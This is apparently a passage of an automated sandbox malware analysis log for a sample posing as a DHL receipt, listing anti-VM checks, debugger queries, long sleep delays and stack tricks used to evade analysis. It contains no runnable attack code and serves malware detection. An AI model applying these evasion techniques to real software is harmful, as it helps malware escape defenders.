                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: DHL AWB Receipt_pdf.bat.exe PID: 3220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AYBPplggzXaXav.exe PID: 7396, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 4D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 8E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: 9E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: B060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: 8610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: 9610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: 9800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMemory allocated: A800000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E rdtsc 8_2_0173096E
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2372Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3466Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 9806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 4364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep count: 168 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep time: -336000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep count: 9806 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 8032Thread sleep time: -19612000s >= -30000s
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep count: 32 > 30
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe TID: 8060Thread sleep time: -32000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: AYBPplggzXaXav.exe, 00000009.00000002.1941366329.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
                Source: CLaoxM16clnn.exe, 00000015.00000002.4207853460.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2298881340.000001B7BD1CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E rdtsc 8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004179B3 LdrLoadDll,8_2_004179B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01788158 mov eax, dword ptr fs:[00000030h]8_2_01788158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EC156 mov eax, dword ptr fs:[00000030h]8_2_016EC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6154 mov eax, dword ptr fs:[00000030h]8_2_016F6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F6154 mov eax, dword ptr fs:[00000030h]8_2_016F6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01784144 mov ecx, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01720124 mov eax, dword ptr fs:[00000030h]8_2_01720124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179A118 mov ecx, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B0115 mov eax, dword ptr fs:[00000030h]8_2_017B0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017201F8 mov eax, dword ptr fs:[00000030h]8_2_017201F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017C61E5 mov eax, dword ptr fs:[00000030h]8_2_017C61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h]8_2_017B61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h]8_2_017B61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h]8_2_017AC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h]8_2_017AC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01730185 mov eax, dword ptr fs:[00000030h]8_2_01730185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01794180 mov eax, dword ptr fs:[00000030h]8_2_01794180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01794180 mov eax, dword ptr fs:[00000030h]8_2_01794180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0171C073 mov eax, dword ptr fs:[00000030h]8_2_0171C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01776050 mov eax, dword ptr fs:[00000030h]8_2_01776050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F2050 mov eax, dword ptr fs:[00000030h]8_2_016F2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01786030 mov eax, dword ptr fs:[00000030h]8_2_01786030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EA020 mov eax, dword ptr fs:[00000030h]8_2_016EA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EC020 mov eax, dword ptr fs:[00000030h]8_2_016EC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01774000 mov ecx, dword ptr fs:[00000030h]8_2_01774000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017320F0 mov ecx, dword ptr fs:[00000030h]8_2_017320F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F80E9 mov eax, dword ptr fs:[00000030h]8_2_016F80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EA0E3 mov ecx, dword ptr fs:[00000030h]8_2_016EA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017760E0 mov eax, dword ptr fs:[00000030h]8_2_017760E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EC0F0 mov eax, dword ptr fs:[00000030h]8_2_016EC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017720DE mov eax, dword ptr fs:[00000030h]8_2_017720DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B60B8 mov eax, dword ptr fs:[00000030h]8_2_017B60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B60B8 mov ecx, dword ptr fs:[00000030h]8_2_017B60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017880A8 mov eax, dword ptr fs:[00000030h]8_2_017880A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F208A mov eax, dword ptr fs:[00000030h]8_2_016F208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179437C mov eax, dword ptr fs:[00000030h]8_2_0179437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017BA352 mov eax, dword ptr fs:[00000030h]8_2_017BA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01798350 mov ecx, dword ptr fs:[00000030h]8_2_01798350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177035C mov ecx, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01710310 mov ecx, dword ptr fs:[00000030h]8_2_01710310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016EC310 mov ecx, dword ptr fs:[00000030h]8_2_016EC310
